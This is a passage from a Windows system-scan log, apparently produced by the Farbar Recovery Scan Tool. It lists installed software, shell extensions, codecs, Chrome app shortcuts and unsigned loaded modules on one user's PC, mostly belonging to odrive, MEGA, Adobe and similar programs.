Wolfram Mathematica 11 (M-WIN-L 11.0.1 5597744) (HKLM\...\M-WIN-L 11.0.1 5597744_is1) (Version: 11.0.1 - Wolfram Research, Inc.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{2AD206F1-152C-4F9D-A24E-6F93FE7A4AFC}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Grammarly\Grammarly for Microsoft Office Suite\6.7.217\DA89310249\GrammarlyShim64.dll (Grammarly, Inc. -> CompanyName)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{35B08E96-DA1F-4321-BF80-D6B53C20F3CF}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{4585263E-BEF5-4A39-A2E8-8F69E0054F0C}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{4BE56754-B616-4998-B825-D16983AEE1B2}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Grammarly\Grammarly for Microsoft Office Suite\6.7.217\DA89310249\Grammarly.AddIn.Connect.ActiveX.dll (Grammarly, Inc. -> Grammarly)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel(R) pGFX -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Autodesk\webdeploy\production\013be2658e0f76cf3bfa01262889994ea1c15a54\NPreview10.dll (Autodesk, Inc. -> )
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{E07BCA71-E88B-4A5E-BA46-69A52D6B9B20}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems Incorporated -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ 0drive.Active] -> {4585263E-BEF5-4A39-A2E8-8F69E0054F0C} => C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ 0drive.Locked] -> {E07BCA71-E88B-4A5E-BA46-69A52D6B9B20} => C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ 0drive.Synced] -> {35B08E96-DA1F-4321-BF80-D6B53C20F3CF} => C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers1: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => D:\Programy\Adobe\Acrobat\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-05-18] (Notepad++ -> )
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2020-09-09] (Google LLC -> Google)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2020-09-09] (Google LLC -> Google)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers5: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2020-01-01] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-11-21] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => D:\Programy\Adobe\Acrobat\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.xvid] => C:\Windows\SysWOW64\xvidvfw.dll [235520 2017-12-08] () [File not signed]
HKLM\...\Drivers32: [vidc.x264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [File not signed]
HKLM\...\Drivers32: [vidc.lags] => C:\Windows\SysWOW64\lagarith.dll [230080 2016-09-21] (Cole Williams Software Limited -> )
HKLM\...\Drivers32: [msacm.divxa32] => C:\Windows\SysWOW64\DivXa32.acm [291408 2013-12-17] (Packed With Joy !) [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Any.do.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=ocgddccilgpeepgglnlpchkpgamkgmld
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Google Keep – poznámky a seznamy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=hmjkmjkepdijhoojdojkdfohbdgmmhki
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Vysor.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=gidgenkbbabolejbgbpnhbimgjbffefm
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\bf33aa3a868e27f5\Any.do Extension.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=kdadialhpiikehpdeejjeiikopddkjem
==================== Loaded Modules (Whitelisted) =============
2020-03-19 12:35 - 2017-04-17 10:43 - 003852800 ____N () [File not signed] C:\Program Files (x86)\Bloody7\Bloody7\Data\Mouse\Forms\Internet_Advertisement\Internet_Advertisement_DLL.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000092672 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_ctypes.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000142336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_elementtree.pyd
2020-10-05 22:07 - 2020-04-20 15:22 - 001101824 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_hashlib.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000027648 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_multiprocessing.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 000046592 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_socket.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 000050688 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_sqlite3.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 001422336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_ssl.pyd
2020-10-05 22:07 - 2015-06-11 05:34 - 000729088 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\apsw.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000071168 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\bz2.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000029184 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._AES.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000008704 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._ARC4.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000019968 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._Blowfish.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000054784 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._DES3.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000009728 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Random.OSRNG.winrandom.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000010240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Util._counter.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000007680 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Util.strxor.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000039936 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\psutil._psutil_windows.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000142336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pyexpat.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000008704 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.Qt.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 001721856 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtCore.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 001804288 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtGui.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000503808 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtNetwork.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000099840 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtOpenGL.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000193024 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtPrintSupport.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000320512 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtQml.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000416768 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtQuick.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000180224 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSensors.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000057344 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSerialPort.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000243200 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSql.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000086528 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSvg.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000065024 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtTest.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000117760 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWebKit.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000215040 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWebKitWidgets.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 003975168 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWidgets.pyd
2020-10-05 22:07 - 2016-01-11 22:46 - 000396800 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pythoncom27.dll
2020-10-05 22:07 - 2016-01-11 22:44 - 000110080 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pywintypes27.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000032256 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qdds.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000021504 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qgif.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000027648 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qicns.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000020992 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qico.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000381952 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qjp2.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000204800 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qjpeg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000218112 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qmng.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000015872 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qsvg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000015360 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qtga.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000307712 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qtiff.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000014848 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qwbmp.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000252928 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qwebp.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000877056 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\platforms\qwindows.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000010240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\select.pyd
2020-10-05 22:07 - 2020-10-03 04:52 - 000078848 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\sip.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000634368 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\sqlite3.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000687104 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\unicodedata.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000099328 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32api.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000024576 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32cred.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000017408 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32event.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000118784 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32file.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000035840 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32process.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000107520 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32security.pyd
2020-10-05 22:07 - 2016-06-27 17:25 - 000121344 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\_ctypes.pyd
2020-10-05 22:07 - 2016-06-27 17:26 - 000051712 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\_socket.pyd
2020-10-05 22:07 - 2020-10-03 04:52 - 000712578 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000714980 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000712586 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll
2020-10-05 22:07 - 2016-01-11 22:54 - 000548864 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\pythoncom27.dll
2020-10-05 22:07 - 2016-01-11 22:52 - 000137728 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\pywintypes27.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000712582 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll
2020-10-05 22:07 - 2016-06-27 17:25 - 000693248 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\unicodedata.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000130560 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32api.pyd
2020-10-05 22:07 - 2016-01-11 22:57 - 000522240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32com.shell.shell.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000223744 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32gui.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000017920 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32trace.pyd
2019-11-02 12:44 - 2019-11-02 12:44 - 098275328 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll
2019-11-02 12:44 - 2019-11-02 12:44 - 000092672 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll
2019-11-02 12:44 - 2019-11-02 12:44 - 003922432 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004110848 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Core.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004346368 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Gui.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000544768 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Multimedia.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000084992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5MultimediaWidgets.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000849408 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Network.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000266240 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5OpenGL.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000155648 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Positioning.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000262144 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5PrintSupport.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 002522624 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Qml.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 002236928 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Quick.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000143872 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Sensors.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000056320 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5SerialPort.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000152576 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Sql.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000203776 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Svg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000118784 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Test.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 017492992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5WebKit.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000193536 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5WebKitWidgets.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004372992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Widgets.dll
2016-05-04 19:08 - 2015-12-31 16:15 - 000077312 _____ (Igor Pavlov) [File not signed] D:\Programy\7-Zip\7-zip.dll
2017-09-28 19:41 - 2017-09-28 19:41 - 000266240 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2017-12-11 22:18 - 2015-02-27 11:35 - 000489984 _____ (Newtonsoft) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\Newtonsoft.Json.dll
2020-10-05 22:07 - 2020-04-20 15:19 - 002649600 _____ (Python Software Foundation) [File not signed] C:\Users\Tomika\.odrive\bin\6729\python27.dll
2020-10-05 22:07 - 2016-06-27 17:25 - 003395072 _____ (Python Software Foundation) [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\PYTHON27.DLL
2019-11-02 12:44 - 2019-11-02 12:44 - 000547840 _____ (The Chromium Authors) [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 023507968 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icudt52.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 001798656 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icuin52.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 001304064 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icuuc52.dll
2017-12-11 22:18 - 2017-03-01 11:30 - 000087040 _____ (Wondershare) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppCollect.dll
2017-12-11 22:18 - 2017-03-01 11:30 - 000197632 _____ (Wondershare) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppCommon.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
